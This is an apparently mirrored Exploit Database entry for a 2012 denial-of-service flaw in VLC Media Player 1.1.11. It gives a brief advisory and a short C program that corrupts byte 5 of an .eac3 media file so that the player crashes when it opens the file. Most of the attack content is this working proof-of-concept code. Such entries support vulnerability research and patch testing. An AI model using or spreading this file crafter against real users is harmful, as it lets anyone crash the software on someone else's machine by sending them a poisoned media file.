VideoLAN VLC Media Player 1.1.11 – ‘.EAC3’ File Denial of Service

• Exploit Database
• 140 阅读

• 作者： Dan Fosco
  日期： 2012-03-14
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/38940/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  // source: https://www.securityfocus.com/bid/64626/info   VLC Media Player is prone to a denial-of-service vulnerability.   Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.   VLC Media Player 1.1.11 is vulnerable; other versions may also be affected.   # Exploit Title: VLC v. 1.1.11 .eac3 DOS # Date: 3/14/2012 # Author: Dan Fosco # Vendor or Software Link: www.videolan.org # Version: 1.1.11 # Category:: local # Google dork: n/a # Tested on: Windows XP SP3 (64-bit) # Demo site: n/a   #include <stdio.h>   int main(int argc, char *argv[]) { FILE *f; f = fopen(argv[1], "r+"); fseek(f, 5, SEEK_SET); fputc(&apos;\x00&apos;, f); fclose(f); return 0; }   //code updates eac3 file, can find samples on videolan ftp server